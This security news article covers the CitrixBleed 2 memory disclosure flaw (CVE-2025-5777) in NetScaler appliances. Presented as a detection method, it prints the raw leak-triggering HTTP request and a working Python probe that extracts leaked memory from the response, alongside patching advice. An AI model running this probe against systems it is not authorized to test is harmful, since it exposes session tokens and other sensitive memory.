
A newly disclosed vulnerability in Citrix NetScaler appliances lets attackers read sensitive memory contents with a single HTTP request. It is the second CitrixBleed-style flaw to hit enterprises in recent years and has accordingly been dubbed "CitrixBleed 2".
Security researchers at watchTowr Labs have published technical details of CVE-2025-5777, a memory disclosure vulnerability in NetScaler ADC and NetScaler Gateway appliances configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server. The flaw, which is being exploited in the wild, lets unauthenticated remote attackers pull sensitive data out of the appliance's memory.
The vulnerability stems from improper input validation in the authentication handler. When an attacker sends a login request whose body contains only the parameter name, with no "=" and no value (e.g., "login" instead of "login=username"), the appliance echoes uninitialized memory back inside the XML of its response.
"What would happen if we gave the login parameter and value a little bit of attention, given that we have something at least controllable," the researchers explained, demonstrating how a simple POST request to /p/u/doAuthentication.do can trigger memory leaks.
The technical root cause is a classic C programming error: a local variable that is never assigned on this code path is returned to the user. Because the request carries no "=", the variable meant to hold the login value keeps whatever earlier code left on the stack. That stale value is then handed to a %.*s format specifier, which copies bytes from wherever it points until it reaches a null byte (or the precision limit), so each response can carry fragments of earlier HTTP requests, session data, or other sensitive material still resident in memory.
Critical Detection Method:
Organizations can identify vulnerable systems by sending this HTTP request:
POST /p/u/doAuthentication.do HTTP/1.0
Content-Length: 5

login
The blank line between the headers and the body is required, and Content-Length must be exactly 5, the length of the bare parameter name "login". Vulnerable systems return an XML response whose <InitialValue> element contains leaked memory (different on every request), while patched systems return an empty <InitialValue> or an error message. Note that the probe itself triggers the disclosure, so only run it against appliances you are authorized to test.
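The detection check above, as an added example written for this article (not code from the page, watchTowr, or Citrix): it builds the exact request, sends it over TLS, and classifies the reply by what it finds inside <InitialValue>. The Host header, the function names, and the layout of the two sample replies used to exercise the classifier offline are assumptions; the sample replies are constructed, not captured from a real appliance.

```python
"""Probe a NetScaler Gateway/AAA endpoint for the CVE-2025-5777 memory
disclosure and classify the reply.  Added example, not code from the article,
watchTowr, or Citrix.  Only use against systems you are authorized to test:
the probe itself causes the appliance to leak memory."""
import re
import socket
import ssl
from html import unescape

PROBE_PATH = "/p/u/doAuthentication.do"
# The body is the bare parameter name: no "=" and no value.
PROBE_BODY = b"login"


def build_probe(host: str) -> bytes:
    """Raw HTTP/1.0 request from the article (Host header is an assumption,
    added so the request also works through virtual-host routing)."""
    lines = [
        b"POST " + PROBE_PATH.encode() + b" HTTP/1.0",
        b"Host: " + host.encode(),
        # Content-Length must match the 5 bytes of "login" exactly.
        b"Content-Length: " + str(len(PROBE_BODY)).encode(),
        b"",  # blank line terminates the headers
    ]
    return b"\r\n".join(lines) + b"\r\n" + PROBE_BODY


_INITIAL_VALUE = re.compile(r"<InitialValue>(.*?)</InitialValue>", re.S)


def extract_initial_value(body: str):
    """Text inside <InitialValue> (XML entities decoded), or None if absent."""
    m = _INITIAL_VALUE.search(body)
    return None if m is None else unescape(m.group(1))


def classify(body: str) -> str:
    """vulnerable: <InitialValue> carries data the client never sent;
    patched: the element is present but empty;
    inconclusive: no <InitialValue> at all (error page, non-gateway vserver)."""
    value = extract_initial_value(body)
    if value is None:
        return "inconclusive"
    return "vulnerable" if value else "patched"


def probe(host: str, port: int = 443, timeout: float = 10.0) -> str:
    """Send the probe over TLS and return the decoded response body."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # appliances frequently use self-signed certs
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(build_probe(host))
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    _head, _sep, body = b"".join(chunks).partition(b"\r\n\r\n")
    # Leaked bytes need not be valid UTF-8; keep going rather than fail.
    return body.decode("utf-8", errors="replace")


# Constructed sample replies (assumed layout, not captured from a real device)
# so the classifier can be exercised offline.
SAMPLE_VULNERABLE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<AuthenticateResponse><AuthenticationRequirements><Requirements>"
    "<Requirement><Credential><Type>username</Type>"
    "<Label><Text>User name</Text></Label>"
    "<InitialValue>Cookie: NSC_AAAC=0123abcd&amp;x</InitialValue>"
    "</Credential></Requirement></Requirements></AuthenticationRequirements>"
    "</AuthenticateResponse>"
)
SAMPLE_PATCHED = SAMPLE_VULNERABLE.replace("Cookie: NSC_AAAC=0123abcd&amp;x", "")
SAMPLE_ERROR = "<html><body>Bad Request</body></html>"


if __name__ == "__main__":
    import sys

    reply = probe(sys.argv[1])
    print(classify(reply), repr(extract_initial_value(reply))[:200])
```

Run it as `python probe.py gateway.example.com`. A vulnerable appliance returns something different in <InitialValue> on every call, since each request picks up whatever happened to be on the stack; sending the probe a handful of times and comparing the extracted values is a quick way to confirm the result is genuine leakage rather than a fixed default.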
This is the second major CitrixBleed vulnerability, following CVE-2023-4966, which led to widespread compromises across enterprises globally. The researchers noted that despite active exploitation, "there is a significant portion of the Citrix NetScaler user base that has still not patched."
Immediate Action Required:
- Update NetScaler ADC and Gateway to a fixed build for your release branch
- Monitor authentication logs for unusual POST requests to /p/u/doAuthentication.do
- Implement network segmentation around NetScaler appliances
- Check for indicators of compromise, and treat session tokens as potentially exposed: leaked memory can contain them, so terminate active sessions after patching so that tokens stolen before the update cannot be replayed
The disclosure comes as attackers continue targeting critical infrastructure through enterprise network appliances, emphasizing the urgent need for rapid patch deployment.